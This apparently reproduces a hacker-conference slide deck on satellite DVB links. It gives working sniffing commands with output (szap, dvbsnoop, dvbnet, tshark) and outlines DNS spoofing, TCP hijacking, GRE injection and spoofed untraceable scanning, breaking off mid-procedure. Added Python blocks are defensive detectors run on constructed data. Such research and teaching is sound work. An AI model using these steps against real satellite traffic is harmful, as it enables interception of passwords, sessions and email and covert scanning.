Playing in a Satellite 
environment 1.2 



Why 1.2? 



1. because I'm sure that some people will 
publish more attacks. 

.2 because of previous presentations about 
satellites. 



Who commented on this before? 



■ Warezzman - (in 2004 at Undercon VIII first 

Spanish hackerCON) 

■ Jim Geovedi & Raditya Iryandi 
(HITBSecConf2006) 

■ Adam Laurie (Blackhat 2009 at DC) 



■ Myself at S21Sec Blog (February 2009) 



Intro to SAT 



■ Orbit based satellites 

■ Low Earth orbiting (LEO) 

■ Geostationary orbit (GEO) 

■ Other: Molniya, High (HEO), etc. 

■ Function based satellites 

■ Communications 

■ Earth observation 

■ Other: Scientifics, ISS, etc. 



Intro to SAT 



22,300 mi 
(35,838 km) 



Intro to SAT 



■ Satellite LEO 

■ Meteorological 

■ HAM (Amateur Radio Operator) 

■ Satellite GEO 

■ UFO (UHF Follow ON) Military 

■ Inmarsat 

■ Meteorological (Meteosat) 

■ SCPC /Telephony link FDMA 



Digital Video 
Broadcasting 

The signal from the sky you are 
waiting for 



DVB 



■ Standard of European Telecommunications 
Standards Institute (ETSI). 

■ Defines audio and video transmission, and 
data connections. 

■ DVB-S & DVB-S2 is the specification for 
satellite communications. 



DVB-S 



■ Transponder: Like channels (in Satellite 
comms) 

■ Frequency (C band or Ku). Ex: 12.092 GHz 

■ Polarization, (horizontal/vertical) 

■ Symbol Rate. Ex: 27500Kbps 

■ FEC. 

■ Every satellite has many transponders 
onboard which are operating on different 
frequencies 



DVB-S 




[Diagram: Content (Video, Audio, Teletext, EPG, Cond. Access, IP Packets, Private Data, Applications, App. Info (AIT)) -> Multiplexing -> Transport Stream] 

Transport Stream: 1 Packet = 188 Bytes 

Header with PID (4 Byte) | Adaption Field (n Byte) | Payload: PES / Section / Piped Data (184-n Byte) 



DVB-S 



Header: 0x47 | Flags | PID | Flags 

Body: Adaptation Field | Data 


Program ID (PID): It permits different programs on the same 
transponder, each with different components [Example BBC1 
PIDs: 600 (video), 601 (English audio), 603 (subtitles), 4167 
(teletext)] 

Special PIDs: NIT (Network Information Table), SDT (Service 
Description Table), PMT (Program Map Tables), PAT (Program 
Association Table). 
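
The packet layout above (4-byte header with a 13-bit PID, optional adaptation field of n bytes, payload of 184-n bytes), as an added example that is not part of the original slides. It also reads the header's scrambling bits, which tell an operator which PIDs leave the uplink unscrambled. The function names and the sample stream are constructed for illustration; the PIDs 600, 601 and 603 are the BBC1 values quoted above.

```python
from collections import Counter

TS_PACKET_SIZE = 188
SYNC_BYTE = 0x47


def parse_ts_packet(pkt):
    """Split one 188-byte packet into header fields, adaptation field and payload."""
    if len(pkt) != TS_PACKET_SIZE:
        raise ValueError("a transport stream packet is exactly 188 bytes")
    if pkt[0] != SYNC_BYTE:
        raise ValueError("sync byte 0x47 missing")
    pid = ((pkt[1] & 0x1F) << 8) | pkt[2]      # 13-bit PID spans bytes 1 and 2
    afc = (pkt[3] >> 4) & 0x03                 # adaptation_field_control bits
    adaptation = b""
    offset = 4
    if afc & 0x02:                             # adaptation field present
        n = 1 + pkt[4]                         # length byte plus field body
        if n > TS_PACKET_SIZE - 4:
            raise ValueError("adaptation field overruns the packet")
        adaptation = pkt[4:4 + n]
        offset += n
    payload = pkt[offset:] if afc & 0x01 else b""
    return {
        "pid": pid,
        "payload_unit_start": bool(pkt[1] & 0x40),
        "scrambling": (pkt[3] >> 6) & 0x03,    # 0 means the payload is not scrambled
        "continuity": pkt[3] & 0x0F,
        "adaptation": adaptation,
        "payload": payload,
    }


def summarize(stream):
    """Count packets per PID and collect the PIDs whose payload is sent unscrambled."""
    counts, clear = Counter(), set()
    pos = 0
    while pos + TS_PACKET_SIZE <= len(stream):
        try:
            info = parse_ts_packet(stream[pos:pos + TS_PACKET_SIZE])
        except ValueError:
            pos += 1                           # not aligned: hunt for the next 0x47
            continue
        counts[info["pid"]] += 1
        if info["scrambling"] == 0 and info["payload"]:
            clear.add(info["pid"])
        pos += TS_PACKET_SIZE
    return counts, clear


def make_packet(pid, payload, adaptation_body=None, scrambling=0, cc=0):
    """Build a constructed test packet (sample data, not a capture)."""
    afc = 0x01 | (0x02 if adaptation_body is not None else 0)
    header = bytes([SYNC_BYTE, 0x40 | (pid >> 8), pid & 0xFF,
                    (scrambling << 6) | (afc << 4) | cc])
    af = b"" if adaptation_body is None else bytes([len(adaptation_body)]) + adaptation_body
    room = TS_PACKET_SIZE - 4 - len(af)
    return header + af + payload[:room].ljust(room, b"\xff")


# Constructed stream: two junk bytes before the first sync byte, then five packets.
SAMPLE_STREAM = b"\x00\x01" + b"".join([
    make_packet(0, b"constructed PAT section"),
    make_packet(600, b"video"),
    make_packet(601, b"audio"),
    make_packet(600, b"video", adaptation_body=b"\x00" + b"\xff" * 6, cc=1),
    make_packet(603, b"subtitles", scrambling=2),
])

if __name__ == "__main__":
    counts, clear = summarize(SAMPLE_STREAM)
    for pid in sorted(counts):
        state = "clear" if pid in clear else "scrambled"
        print(f"PID {pid:5d} (0x{pid:04x}): {counts[pid]} packet(s), {state}")
```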



DVB Feeds 



■ Temporary video links. 

■ Live emissions, sports, news. 

■ FTA - video in the open. 



DVB Feeds 




Hispasat Pre news feed (live news) 



DVB Feeds 




DVB Feeds (2002) 




BBC NEWS | Programmes | Newsnight 

http://news.bbc.co.uk/1/hi/programmes/newsnight/2041754.stm 

Thursday, 13 June, 2002, 00:28 GMT 01:28 UK 

Enthusiast watches Nato spy pictures 

By Mark Urban 
Newsnight's Diplomatic Editor 

Nato surveillance flights in the 
Balkans are beaming their 
pictures over an insecure 
satellite link - and anyone can 
tune in and watch their 
operations live. 

The discovery was made last 
November by John Locker, a 
satellite enthusiast in north 
west England. 



DVB Feeds (2002) 




Captured NATO feeds 



DVB Feeds (2002) 




NATO COMINT official 



DVB Feeds 



■ It is widely known that the Department of 
Defense (DoD) and some US defense 
contractors use satellites and DVB for their 
comms. 



DVB Feeds 



■ Let's see: 



http://telecom.esa.int/telecom/media/document/DVB-RCS%20Networks%20for%20the%20US%20Defense%20Market%20(R^).pdf 



DVB Feeds (2009) 



http://online.wsj.com/article/SB126102247889095011.html#printMode 

DECEMBER 17, 2009 

Insurgents Hack U.S. Drones 

$26 Software Is Used to Breach Key Weapons in Iraq; Iranian Backing Suspected 
By SIOBHAN GORMAN, YOCHI J. DREAZEN and AUGUST COLE 

WASHINGTON — Militants in Iraq have used $26 off-the-shelf software to intercept live video feeds from U.S. Predator drones, 
potentially providing them with information they need to evade or monitor U.S. military operations. 

Senior defense and intelligence officials said Iranian-backed insurgents intercepted the video feeds by taking advantage of an 
unprotected communications link in some of the remotely flown planes' systems. Shiite fighters in Iraq used software programs such as 
Sky Grabber — available for as little as $25.95 on the Internet — to regularly capture drone video feeds, according to a person familiar 
with reports on the matter. 

U.S. officials say there is no evidence that militants were able to take control of the drones or otherwise interfere with their flights. Still, 
the intercepts could give America's enemies battlefield advantages by removing the element of surprise from certain missions and 
making it easier for insurgents to determine which roads and buildings are under U.S. surveillance. 

The drone intercepts mark the emergence of a shadow cyber war within the U.S.-led conflicts overseas. They also point to a potentially 
serious vulnerability in Washington's growing network of unmanned drones, which have become the American weapon of choice in both 
Afghanistan and Pakistan. 

The Obama administration has come to rely heavily on the unmanned drones because they allow the U.S. to safely monitor and stalk 
insurgent targets in areas where sending American troops would be either politically untenable or too risky. 

The stolen video feeds also indicate that U.S. adversaries continue to find simple ways of counteracting sophisticated American military 
technologies. 



DVB Feeds (2009) 




US COMINT official 



DVB Feeds 



■ Find feeds: 

■ Lists of channels in www 

■ Blind Scan 

■ Visual representations of the signal 



DVB Feeds - To know more 



■ Dr HANS 

■ http://drhans.jinak.cz/news/index.php 

■ Zackyfiles 

■ http://www.zackyfiles.com (in Spanish) 

■ Satplaza 

■ http://www.satplaza.com 



DVB Data 



■ Two scenarios 

■ Satmodem 

■ Satellite Interactive Terminal (SIT) or Astromodem 



DVB Data - Satmodem 

[Diagrams: Satmodem scenario, with only the DOWNLINK going via satellite] 



DVB Data - Astromodem 

[Diagram: Astromodem scenario, with DOWNLINK & UPLINK via satellite; ISP DOWNLINK & UPLINK] 



Satellite Coverage 



[Figure: Typical combined downlink coverages for EUROBIRD 3 at 33° East] 



DVB Data 



Anyone with coverage can SNIFF 
the DVB Data, and normally it is 
unencrypted. 



DVB Data 



■ What do you need: 

■ Skystar 2 DVB Card 

■ linuxtv-dvb-apps 

■ Wireshark 

■ The antenna 

■ Data to point it. 



DVB Data 



I bought it for 50c!!! from a 
PayTV ex-"hacker" :P 
(Including a set-top box that I will 
not use) 



DVB Data 



[Screenshot: eBay search results for "skystar 2" (2 results found): SkyStar 2 TV PCI Revision 2.6D for Satellite Internet, $41.00, 6d 1h 4m left; SkyStar 2 TV PCI Revision 2.6D for Satellite Internet, 2 bids, $24.00, 2d 0h 45m left] 



DVB Data 



[Screenshot: eBay.es search results for "parabolica", all items located in Spain: Abaks 2.4 GHz feeder for a 24-27 dBi parabolic antenna, 23,00 EUR; 60 cm parabolic antenna kit + 0,1 dB LNB, 19,99 EUR; Satycon 60 cm parabolic antenna (complete kit), 20,03 EUR; Satycon 80 cm parabolic antenna (complete kit), 29,16 EUR; satellite finder for parabolic antennas ("very practical and cheap for locating satellites"), 12,00 EUR] 





DVB Data 



Linux has the modules for this card by 
default, we only need the tools to manage it: 

linuxtv-dvb-apps 

My version is 1.1.1 and I use Fedora (Not too 
cool to use Debian :P). 



Sniffing Data 



Once the antenna and the card are installed 
and linuxtv-dvb-apps is compiled and installed, 
the process is: 

1- Tune the DVB Card 

2- Find a PID with data 

3- Create an Ethernet interface associated to that 
PID 

We can repeat steps 2 and 3 as many times as we want. 



Sniffing Data 



Tune DVB Card 

The tool we must use is szap and we need the 
transponder's parameters in a configuration 
file. 



For example, for "Sirius-4 Nordic Beam": 

# echo "sirius4N:12322:v:0:27500:0:0:0" >> channels.conf 



Sniffing Data 



We run szap with the channel configuration 
file and the transponder we want to use (the 
configuration file can have more than one). 

# szap -c channels.conf sirius4N 

We must keep it running. 



Sniffing Data 



[root@sathunter ~]# szap -c channels.conf data1 
reading channels from file 'channels.conf' 
zapping to 1 'data1': 
sat 0, frequency = 12591 MHz V, symbolrate 30000000, vpid = 0x0000, apid = 0x000 
using '/dev/dvb/adapter0/frontend0' and '/dev/dvb/adapter0/demux0' 
status 03 | signal 6aea | snr 6c99 | ber 00008856 | unc 00000000 | 
status 1f | signal b146 | snr d7ca | ber 00000af3 | unc 00000000 | FE_HAS_LOCK 
status 1f | signal b1b5 | snr d803 | ber 00000000 | unc 00000000 | FE_HAS_LOCK 
status 1f | signal b072 | snr d746 | ber 00000000 | unc 00000000 | FE_HAS_LOCK 
status 1f | signal b1ad | snr d782 | ber 00000000 | unc 00000000 | FE_HAS_LOCK 
status 1f | signal b12b | snr d7c7 | ber 00000000 | unc 00000000 | FE_HAS_LOCK 
status 1f | signal b151 | snr d776 | ber 00000000 | unc 00000000 | FE_HAS_LOCK 
status 1f | signal b164 | snr d7bb | ber 00000000 | unc 00000000 | FE_HAS_LOCK 



Sniffing Data 



The transponder parameters can be found 
around the Internet. 

http://www.fastsatfinder.com/transponders.html 



Sniffing Data 



1- Tune the DVB Card 

2- Find a PID with data 

3- Create an Ethernet interface associated to that 
PID 



Sniffing Data 



■ Find a PID 

# dvbsnoop -s pidscan 

Search for the data sections in the results. 



Sniffing Data 



[root@sathunter ~]# dvbsnoop -s pidscan 
dvbsnoop V1.4.50 -- http://dvbsnoop.sourceforge.net/ 

Transponder PID-Scan... 

PID found:    0 (0x0000)  [SECTION: Program Association Table (PAT)] 
PID found:   16 (0x0010)  [SECTION: Network Information Table (NIT) - actual network] 
PID found:   17 (0x0011)  [SECTION: Service Description Table (SDT) - actual transport stream] 
PID found:   20 (0x0014)  [SECTION: Time Date Table (TDT)] 
PID found: 1000 (0x03e8)  [SECTION: Program Map Table (PMT)] 
PID found: 1001 (0x03e9)  [SECTION: Program Map Table (PMT)] 
PID found: 1010 (0x03f2)  [SECTION: User private] 
PID found: 1011 (0x03f3)  [SECTION: User private] 
PID found: 1012 (0x03f4)  [SECTION: User private] 
PID found: 1013 (0x03f5)  [SECTION: User private] 
PID found: 1014 (0x03f6)  [SECTION: Network Information Table (NIT) - other network] 
PID found: 1020 (0x03fc)  [SECTION: DSM-CC - private data section // DVB datagram] 
PID found: 1021 (0x03fd)  [SECTION: DSM-CC - private data section // DVB datagram] 
PID found: 1022 (0x03fe)  [SECTION: DSM-CC - private data section // DVB datagram] 
PID found: 1023 (0x03ff)  [SECTION: DSM-CC - private data section // DVB datagram] 
PID found: 1025 (0x0401)  [SECTION: DSM-CC - private data section // DVB datagram] 
PID found: 1026 (0x0402)  [SECTION: DSM-CC - private data section // DVB datagram] 



Sniffing Data 



1- Tune the DVB Card 

2- Find a PID with data 

3- Create an Ethernet interface associated to 
that PID 



Sniffing Data 



■ Create an interface associated to a PID 

# dvbnet -a <adapter number> -p <PID> 

■ Activate it 

# ifconfig dvb0_<iface number> up 



Sniffing Data 



[root@sathunter ~]# dvbnet -a 0 -p 1022 
DVB Network Interface Manager 
Version 1.1.0-TVF (Build vie mar 06 12:54:43 2009) 
Copyright (C) 2003, TV Files S.p.A 

Device: /dev/dvb/adapter0/net0 
Status: device dvb0_0 for pid 1022 created successfully. 
[root@sathunter ~]# ifconfig dvb0_0 up 
[root@sathunter ~]# ifconfig dvb0_0 
dvb0_0    Link encap:Ethernet  HWaddr 00:D0:D7:0C:67:8D 
          inet6 addr: fe80::2d0:d7ff:fe0c:678d/64 Scope:Link 
          UP BROADCAST RUNNING NOARP MULTICAST  MTU:4096  Metric:1 
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0 
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b) 
          Base address:0x3fe 

[root@sathunter ~]# 



Sniffing Data 



Back to the pidscan results 






Sniffing Data 



Create another interface 



[root@sathunter ~]# dvbnet -a 0 -p 1021 
DVB Network Interface Manager 
Version 1.1.0-TVF (Build vie mar 06 12:54:43 2009) 
Copyright (C) 2003, TV Files S.p.A 

Device: /dev/dvb/adapter0/net0 
Status: device dvb0_1 for pid 1021 created successfully. 
[root@sathunter ~]# ifconfig dvb0_1 up 
[root@sathunter ~]# ifconfig dvb0_1 
dvb0_1    Link encap:Ethernet  HWaddr 00:D0:D7:0C:67:8D 
          inet6 addr: fe80::2d0:d7ff:fe0c:678d/64 Scope:Link 
          UP BROADCAST RUNNING NOARP MULTICAST  MTU:4096  Metric:1 
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0 
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b) 
          Base address:0x3fd 



Sniffing Data 



Wireshark is our friend 



[root@sathunter ~]# tshark -ni dvb0_1 -w /dev/null 
Capturing on dvb0_1 
16358 
[root@sathunter ~]# 

16358 packets in 10 seconds 



Sniffing data 



Display filter: none 

Protocol                                                   % Packets  Packets     Bytes  Mbit/s  End Packets  End Bytes  End Mbit/s 
Frame                                                        100,00%    17122  11988350   7,650            0          0       0,000 
 Ethernet                                                    100,00%    17122  11988350   7,650            0          0       0,000 
  Internet Protocol                                          100,00%    17122  11988350   7,650            0          0       0,000 
   Generic Routing Encapsulation                              13,41%     2296   1100945   0,703            7        294       0,000 
   User Datagram Protocol                                      7,67%     1313    489998   0,313            0          0       0,000 
    Domain Name Service                                        0,71%      121     23855   0,015          120      23750       0,015 
    Data                                                       3,84%      658    286093   0,183          658     286093       0,183 
    UDP Encapsulation of IPsec Packets                         2,98%      510    177409   0,113            1         43       0,000 
    eDonkey Protocol                                           0,02%        4       305   0,000            4        305       0,000 
    Simple Network Management Protocol                         0,04%        7       700   0,000            7        700       0,000 
    Internet Security Association and Key Management Protocol  0,05%        9      1271   0,001            9       1271       0,001 
    Hypertext Transfer Protocol                                0,01%        1        95   0,000            1         95       0,000 
    Network Time Protocol                                      0,02%        3       270   0,000            3        270       0,000 
   Transmission Control Protocol                              64,99%    11128   8923504   5,694         4796    1517444       0,968 
    Hypertext Transfer Protocol                               25,23%     4320   6194417   3,953         4165    6093498       3,888 
    Data                                                       7,31%     1251    970027   0,619         1251     970027       0,619 
    Simple Mail Transfer Protocol                              1,27%      218     28045   0,018          218      28045       0,018 
    MSN Messenger Service                                      0,19%       32      6636   0,004           32       6636       0,004 
    Secure Socket Layer                                        1,43%      244    132109   0,084          243     131519       0,084 
    TPKT-ISO on TCP - RFC 1006                                 0,22%       37      2451   0,002           37       2451       0,002 
    SSH Protocol                                               0,22%       38      6256   0,004           38       6256       0,004 
    Financial Information eXchange Protocol                    0,05%        8      1157   0,001            6        558       0,000 
    Post Office Protocol                                       0,66%      113     59548   0,038          113      59548       0,038 
    Modbus/TCP                                                 0,18%       30      1980   0,001           30       1980       0,001 
    Virtual Network Computing                                  0,15%       26      1616   0,001            0          0       0,000 
    MySQL Protocol                                             0,01%        2       224   0,000            2        224       0,000 
    Firebird SQL Database Remote Protocol                      0,07%       12      1520   0,001           12       1520       0,001 
    Point-to-Point Tunnelling Protocol                         0,01%        1        74   0,000            1         74       0,000 
   Data                                                        0,19%       33      1914   0,001           33       1914       0,001 
   Encapsulating Security Payload                             13,33%     2283   1466738   0,936         2283    1466738       0,936 
   Internet Control Message Protocol                           0,40%       69      5251   0,003           69       5251       0,003 



Sniffing Data 



■ We can have more than one PID assigned to an 
interface, this will be very useful. 

■ Malicious users can: 

■ Catch passwords. 

■ Catch cookies and get into authenticated HTTP 
sessions. 

■ Read emails 

■ Catch sensitive files 

■ Do traffic analysis 

■ Etc .... 



Sniffing Data 



Reminder: 

In satellite communications we have two 
scenarios: 

A- Satmodem, only downlink via satellite. 

B- Astromodem, both uplink and downlink via 
satellite. 



Sniffing Data 



We can only sniff the downloaded data. We 
can only sniff one direction in a connection. 



Some "old" Stuff in Sat hacking 



■ DNS Spoofing 

■ TCP hijacking 

■ Attacking GRE 



DNS Spoofing 



DNS Spoofing is the art of making a DNS 
entry point to another IP than it would 
be supposed to point to. (SecureSphere) 



DNS Spoofing 



■ Data we need to perform this attack 

■ DNS Request ID 

■ Source Port 

■ Source IP 

■ Destination IP 

■ Name/IP asking for 



DNS Spoofing 



■ It's trivial to see that if we sniff a DNS 
request we have all that information and we 
can spoof the answer. 

■ Many tools around do this job, the only 
thing we also need is to be faster than the 
real DNS server (jizz). 



DNS Spoofing 



■ Why is this attack important? 

■ Think of phishing 

■ With this attack, sniffing the uplink becomes possible 

■ Rogue WPAD service 

■ Sslstrip can be used to avoid SSL connections. 
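
Seen from the monitoring side, the race described above leaves a trace: the client receives two responses to one query (same client IP and port, same request ID, same name) that carry different answers. The detector below is an added example, not part of the original slides; the function names are hypothetical and the packets are constructed sample data using documentation addresses.

```python
import struct


def _skip_name(msg, off):
    """Return the offset just past a (possibly compressed) domain name."""
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:          # compression pointer: two bytes, ends the name
            return off + 2
        off += 1
        if length == 0:
            return off
        off += length


def _read_qname(msg, off):
    """Read the uncompressed question name starting at off."""
    labels = []
    while msg[off] != 0:
        n = msg[off]
        labels.append(msg[off + 1:off + 1 + n].decode("ascii"))
        off += 1 + n
    return ".".join(labels).lower(), off + 1


def parse_response(msg):
    """Return (request ID, question name, A-record answers) or None if not a usable response."""
    try:
        txid, flags, qd, an, _, _ = struct.unpack("!6H", msg[:12])
        if not flags & 0x8000 or qd != 1:  # QR bit clear means it is a query
            return None
        qname, off = _read_qname(msg, 12)
        off += 4                           # QTYPE and QCLASS
        addrs = []
        for _ in range(an):
            off = _skip_name(msg, off)
            rtype, _cls, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
            off += 10
            if rtype == 1 and rdlen == 4:
                addrs.append(".".join(str(b) for b in msg[off:off + 4]))
            off += rdlen
        return txid, qname, tuple(sorted(addrs))
    except (IndexError, struct.error, UnicodeDecodeError):
        return None


def find_conflicting_answers(packets):
    """packets: iterable of (timestamp, client_ip, client_port, dns_payload)."""
    first_seen, alerts = {}, []
    for ts, ip, port, payload in packets:
        parsed = parse_response(payload)
        if parsed is None:
            continue
        txid, qname, addrs = parsed
        key = (ip, port, txid, qname)
        if key in first_seen and first_seen[key][1] != addrs:
            alerts.append({"client": ip, "qname": qname,
                           "first": first_seen[key], "second": (ts, addrs)})
        first_seen.setdefault(key, (ts, addrs))
    return alerts


def build_response(txid, qname, addr):
    """Constructed sample response with one A record (test data only)."""
    name = b"".join(bytes([len(l)]) + l.encode() for l in qname.split(".")) + b"\x00"
    header = struct.pack("!6H", txid, 0x8180, 1, 1, 0, 0)
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 60, 4) + bytes(int(x) for x in addr.split("."))
    return header + name + struct.pack("!HH", 1, 1) + answer


# Constructed capture: one query answered twice with different addresses, one clean retransmission.
SAMPLE = [
    (0.010, "10.1.1.5", 40001, build_response(0x1A2B, "www.example.com", "203.0.113.66")),
    (0.310, "10.1.1.5", 40001, build_response(0x1A2B, "www.example.com", "198.51.100.7")),
    (0.500, "10.1.1.9", 51515, build_response(0x0042, "mail.example.com", "198.51.100.25")),
    (0.900, "10.1.1.9", 51515, build_response(0x0042, "mail.example.com", "198.51.100.25")),
]

if __name__ == "__main__":
    for alert in find_conflicting_answers(SAMPLE):
        print(alert)
```

The check only says that two different answers arrived for one query; which of the two is genuine has to be decided by other means.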



Some "old" Stuff in Sat hacking 



■ DNS Spoofing 

■ TCP hijacking 

■ Attacking GRE 



TCP hijacking 



TCP session hijacking is when a hacker takes 
over a TCP session between two machines. 
(ISS) 



TCP hijacking 




1: Seq=S1       ACK=A1       Datalen=L1 

2: Seq=A1       ACK=S1+L1    Datalen=L2 

3: Seq=S1+L1    ACK=A1+L2    Datalen=L3 



If we sniff 1 we can predict Seq and Ack of 2 and 
we can send the payload we want in 2 



TCP Hijacking 




TCP Hijacking 



■ Initially we can only have a false connection with A. 

■ In certain circumstances, we can make this attack 
with B, when L2 is predictable. 

■ Some tools for doing this: 

■ Hunt 

■ Shijack 

■ Scapy 
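
The Seq/ACK arithmetic of the diagram above, together with the trace an injected packet 2 leaves for a monitor near the receiver: two segments that claim the same sequence positions with different bytes. This is an added example, not part of the original slides; the function names are hypothetical and the segments are constructed sample data.

```python
MOD = 1 << 32   # TCP sequence numbers wrap at 2**32


def expected_reply(seq, ack, datalen):
    """(Seq, ACK) the peer must use to answer a segment: packet 2 of the diagram."""
    return ack % MOD, (seq + datalen) % MOD


def find_conflicting_segments(segments):
    """segments: (timestamp, flow_id, seq, payload), all in one direction of each flow.

    Remembers the first byte seen at every sequence position and reports later
    segments that place a different byte there. A plain retransmission repeats
    the same bytes and is not reported.
    """
    first_byte, alerts = {}, []
    for ts, flow, seq, payload in segments:
        conflict = False
        for i, byte in enumerate(payload):
            key = (flow, (seq + i) % MOD)
            if key in first_byte and first_byte[key] != byte:
                conflict = True
            first_byte.setdefault(key, byte)
        if conflict:
            alerts.append((ts, flow, seq))
    return alerts


# Constructed values for packet 1 of the diagram: Seq=S1, ACK=A1, Datalen=L1.
S1, A1, L1 = 1000, 5000, 20
REPLY_SEQ, REPLY_ACK = expected_reply(S1, A1, L1)

# Constructed capture: flow "A<-B" gets two different packet-2 candidates,
# flow "C<-D" gets an ordinary retransmission.
SAMPLE = [
    (0.05, "A<-B", REPLY_SEQ, b"HTTP/1.1 302 Found\r\n"),
    (0.30, "A<-B", REPLY_SEQ, b"HTTP/1.1 200 OK\r\n"),
    (0.40, "C<-D", 900, b"hello"),
    (0.90, "C<-D", 900, b"hello"),
]

if __name__ == "__main__":
    print("packet 2 must carry Seq=%d ACK=%d" % (REPLY_SEQ, REPLY_ACK))
    for ts, flow, seq in find_conflicting_segments(SAMPLE):
        print("conflicting data on %s at seq %d (t=%.2f)" % (flow, seq, ts))
```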



Some "old" Stuff in Sat hacking 



■ DNS Spoofing 

■ TCP hijacking 

■ Attacking GRE 



Attacking GRE 



■ Generic Routing Encapsulation 

■ Point to point tunneling protocol 

■ 13% of Satellite's data traffic in our 
transponder is GRE 



Attacking GRE 



This chapter is based on Phenoelit's discussion 
paper written by FX, applied to the satellite 
scenario. 

Original paper: 

http://www.phenoelit-us.org/irpas/gre.html 



Attacking GRE 




Attacking GRE 



Find a target: 

# tshark -ni dvb0_0 -R gre -w capture.cap 



Attacking GRE 



GRE Packet 

IP dest 1 | IP source 1 | GRE header | Payload IP dest | Payload IP source | Payload IP Header | Payload Data 



Attacking GRE 



■ IP dest 1 and source 1 must be Internet 
reachable IPs 

■ The payload's IPs are usually internal. 



Attacking GRE 




[Diagram: hosts 10.0.0.54 and 10.0.0.5] 



Attacking GRE 



(*) GRE Packet 

1.1.1.1 | 1.1.1.2 | GRE header (32 bits without flags) | 10.0.0.5 | 10.0.0.54 | Payload IP Header | Payload Data 



Attacking GRE 



(1) GRE Packet 

1.1.1.1 | 1.1.1.2 | GRE header (32 bits without flags) | 10.0.0.5 | 10.0.0.54 | Payload IP Header | Payload Data 



Attacking GRE 



(2) IP Packet 

10.0.0.5 | 10.0.0.54 | IP header | Data 



Attacking GRE 



(3) IP Packet 

10.0.0.54 | 10.0.0.5 | IP header 2 | Data 2 



Attacking GRE 



(4) GRE Packet 

1.1.1.2 | 1.1.1.1 | GRE header (32 bits without flags) | 10.0.0.54 | 10.0.0.5 | Payload IP Header 2 | Payload Data 2 



Attacking GRE 



In Phenoelit's attack the payload's source IP is our public IP. That 
attack fails when that IP isn't reachable from the internal 
LAN, and you can be logged. 

I use an internal IP because we can sniff the responses. 
To improve the attack further, find an internal IP that is not in use. 
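
The GRE header shown above carries no authentication, and the optional key field travels in the clear, so the practical countermeasure is to know which tunnels cross the satellite link unprotected and wrap them in IPsec. The audit below is an added example, not part of the original slides: it decodes the outer IP header, the GRE header and the inner IP header of captured packets and lists, per tunnel, the internal hosts that are visible. Function names are hypothetical; the sample packets are constructed, reusing the 1.1.1.1/1.1.1.2 and 10.0.0.5/10.0.0.54 addresses of the slides.

```python
import ipaddress
import struct

GRE, ESP = 47, 50   # IP protocol numbers


def parse_ipv4(buf):
    """Return (source, destination, protocol, payload) of an IPv4 packet."""
    if len(buf) < 20 or buf[0] >> 4 != 4:
        raise ValueError("not an IPv4 header")
    ihl = (buf[0] & 0x0F) * 4
    if ihl < 20 or len(buf) < ihl:
        raise ValueError("bad IPv4 header length")
    return (str(ipaddress.IPv4Address(buf[12:16])),
            str(ipaddress.IPv4Address(buf[16:20])), buf[9], buf[ihl:])


def parse_gre(buf):
    """Return (key or None, protocol type, payload) of a version 0 GRE header."""
    if len(buf) < 4:
        raise ValueError("truncated GRE header")
    flags, ptype = struct.unpack("!HH", buf[:4])
    if flags & 0x4007:
        raise ValueError("only version 0 without source routing is handled")
    off = 4 + (4 if flags & 0x8000 else 0)      # checksum + reserved, if present
    key = None
    if flags & 0x2000:                          # key present (sent in the clear)
        key = struct.unpack("!I", buf[off:off + 4])[0]
        off += 4
    if flags & 0x1000:                          # sequence number present
        off += 4
    return key, ptype, buf[off:]


def audit_tunnels(packets):
    """Group GRE-in-IPv4 packets by tunnel endpoints and list what each tunnel exposes."""
    report = {}
    for pkt in packets:
        try:
            o_src, o_dst, proto, rest = parse_ipv4(pkt)
            if proto != GRE:
                continue                        # e.g. ESP: payload is not readable
            key, ptype, inner = parse_gre(rest)
            if ptype != 0x0800:
                continue                        # inner protocol is not IPv4
            i_src, i_dst, _, _ = parse_ipv4(inner)
        except (ValueError, struct.error):
            continue
        entry = report.setdefault(tuple(sorted((o_src, o_dst))),
                                  {"packets": 0, "keyed": False, "inner_hosts": set()})
        entry["packets"] += 1
        entry["keyed"] = entry["keyed"] or key is not None
        entry["inner_hosts"].update((i_src, i_dst))
    for entry in report.values():
        entry["leaks_private"] = any(ipaddress.ip_address(h).is_private
                                     for h in entry["inner_hosts"])
    return report


def ipv4(src, dst, proto, payload):
    """Constructed IPv4 packet for the sample data (checksum left at 0)."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64, proto, 0,
                       ipaddress.IPv4Address(src).packed,
                       ipaddress.IPv4Address(dst).packed) + payload


def gre(inner, key=None):
    """Constructed GRE header carrying IPv4, optionally with a key."""
    opt = struct.pack("!I", key) if key is not None else b""
    return struct.pack("!HH", 0x2000 if key is not None else 0, 0x0800) + opt + inner


# Constructed capture: the tunnel of the slides in both directions, a keyed tunnel, one ESP packet.
SAMPLE = [
    ipv4("1.1.1.2", "1.1.1.1", GRE, gre(ipv4("10.0.0.54", "10.0.0.5", 6, b"request"))),
    ipv4("1.1.1.1", "1.1.1.2", GRE, gre(ipv4("10.0.0.5", "10.0.0.54", 6, b"reply"))),
    ipv4("192.0.2.1", "192.0.2.2", GRE, gre(ipv4("10.8.0.1", "10.8.0.2", 17, b"x"), key=0x1234)),
    ipv4("192.0.2.9", "192.0.2.10", ESP, b"\x00" * 16),
]

if __name__ == "__main__":
    for endpoints, entry in sorted(audit_tunnels(SAMPLE).items()):
        print(endpoints, entry)
```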



HTSNACBT Attack 



How 

To 

Scan 

NSA 

And 

Cannot 

Be 

Traced 



HTSNACBT Attack 



We can send a SYN packet with any 
destination IP and TCP port (spoofing a 
satellite's routable source IP), and we can 
sniff the responses. 

We can analyze the responses. 



HTSNACBT Attack 



OR... We can configure our Linux like a 
satellite connected host. 



VERY EASY!!! 



HTSNACBT Attack 



■ What we need: 

■ An Internet connection (let's use it as uplink) with 
any technology that lets you spoof. 

■ A receiver, a card.... 



HTSNACBT Attack 



■ Let's rock! 

■ Find a satellite IP that is not in use. I ping IPs next to 
another sniffable satellite IP to find a non-responding 
IP. We must sniff our ping with the 
DVB Card (you must save the packets). 



